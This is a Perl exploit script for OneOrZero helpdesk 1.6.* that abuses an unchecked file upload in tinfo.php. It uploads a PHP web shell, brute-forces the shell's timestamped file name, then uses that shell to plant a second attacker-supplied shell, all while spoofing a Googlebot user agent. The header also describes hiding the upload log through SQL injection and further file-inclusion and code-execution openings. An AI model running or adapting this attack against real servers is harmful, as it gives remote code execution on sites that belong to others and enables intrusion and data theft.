#!/usr/bin/perl =about OneOrZero 1.6.* Perl exploit AUTHOR discovered & written by Ams ax330d [doggy] gmail [dot] com VULN. DESCRIPTION: In 'tinfo.php' script there are function named uploadAttachment() through which we are able to upload files. It does not checks what the file is uploaded. EXPLOIT WORK: First of all it uploads small shell, then, due to unknown shell name, it bruteforces it. (Uploaded shell name is concatenation of original filename, unix timestamp and substracted microseconds from time.) Then it uploads new shell through small shell. (Script saves to DB what has been uploaded, but if magic_quotes_gpc=off exploit will disable this logging via SQl-inj.) REQUIREMENTS: Upload must be allowed. PS: With register_globals=on there are even more vulnerabilities, starting from LFI till remote code execution. =cut use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; $| = 1; &banner; my $expl_url = shift or &usage; my $tshell2 = shift; &usage unless -f $tshell2; my $tshell = q(); my $spider = LWP::UserAgent->new; $spider->timeout(9); $spider->max_redirect(0); $spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); exploit($expl_url); sub exploit { $_ = shift; my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?}; print "\n\tExploiting: $prot://$host$path\n"; my $req = POST "$prot://$host$path/tinfo.php?id=999999", Content_Type => 'form-data', Content => [send_mail => 1, SelectedFile => [ undef, 'by441e.php', 'Content_Type' => '\' text', 'Content' => $tshell ] ]; my $start_time = time(); my $res = $spider->request($req); if (!$res->is_success) { print "\tFailure...\n" . $res->status_line . "\n"; return 0; } if ($res->content !~ /by441e\.php/) { print "\tFailure...\n"; return 0; } else { print "\n\tTest shell uploaded"; } my $finish_time = time(); print "\n\tStarting bruteforce (start:${start_time}000 finish:${start_time}999)\n"; for my $sec ($start_time .. $finish_time) { for my $micro ('000' .. '999') { print "\t$prot://$host$path/attachments/$sec${micro}_by441e.php\r"; $res = $spider->request(HEAD "$prot://$host$path/attachments/$sec${micro}_by441e.php"); if ($res->status_line =~ /200/) { print "\n\tFound one of shells..."; if (reload("$prot://$host$path/attachments/$sec${micro}_by441e.php")) { print "\tShell: $prot://$host$path/attachments/sha.php\n"; } return; } } } print "\n\tCould not find shell...\n"; } sub reload { my $addr = shift; my $req = POST $addr, Content_Type => 'form-data', Content => [ f => [ $tshell2, 'sha.php']]; my $res = $spider->request($req); if ($res->content =~ /ok1/) { print "new shell uploaded!\n"; return 1; } else { print "could not upload new shell.\n"; return 0; } } sub usage { print " Provide url and shell what to upload. Usage: perl $0 http://example.com localshell.php "; exit; } sub banner { print " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ OneOrZero 1.6.* exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; }